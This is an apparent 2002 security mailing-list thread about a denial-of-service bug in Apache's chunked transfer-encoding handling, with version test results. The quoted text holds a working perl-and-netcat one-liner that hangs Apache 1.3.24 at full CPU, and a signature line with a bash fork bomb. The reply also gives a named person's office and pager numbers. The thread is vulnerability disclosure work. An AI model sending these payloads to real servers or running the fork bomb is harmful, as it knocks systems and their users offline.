RE: apache chunked encoding

["Horner, Jonathan J. (JH8) " <jh8 () y12 doe gov>]

Interesting, but when I tried this against a Stronghold build 3015 (Apache
1.3.22), I get this in my error_log

chunked Transfer-Encoding forbidden: http://www/index.html

Ideas?

Thanks,

Jon Horner, CISSP
SAIC WebPool
jh8 () y12 doe gov
Office:  (865) 425-5178
Pager:  (865) 417-5012


> -----Original Message-----
> From: Edwin Groothuis [mailto:edwin () mavetju org]
> Sent: Wednesday, June 19, 2002 10:13 PM
> To: Przemyslaw Frasunek
> Cc: vuln-dev () securityfocus com
> Subject: Re: apache chunked encoding
>
>
> On Thu, Jun 20, 2002 at 12:21:47AM +0200, Przemyslaw Frasunek wrote:
> > I was playing a bit with chunked encoding vulnerability and 
> found the
> > following. When I send a request to Apache 1.3.24 using malformed
> > chunked encoding, httpd process goes into infinite loop and CPU load
> > grows to 100%. Example:
> >
> > perl -e 'print "POST http://www/index.html 
> HTTP/1.1\r\nAccept: */*\r\nHost: www\r\nContent-Type: 
> application/x-www-form-urlencoded\r\nTransfer-Encoding: 
> chunked\r\nContent-length: 5000\r\n\r\n" . "A"x5000 . 
> "\r\n\r\n"' | nc localhost 80
> > 62681 www       63   0   146M  5364K RUN      3:08 45.90% 
> 45.90% apache
> > 42121 www       63   0   139M  2524K RUN      1:15 44.97% 
> 44.97% apache
> > Can anyone try it with 1.3.26?
>
> Apache 1.3.26 doesn't show this behaviour
> (yes, I've tried it with 1.3.20 first)
>
> Edwin
> -- 
> Edwin Groothuis      |           Personal website: 
http://www.MavEtJu.org
edwin () mavetju org    |        Interested in MUDs? Visit Fatal Dimensions:
bash$ :(){ :|:&};:   |                    http://www.FatalDimensions.org/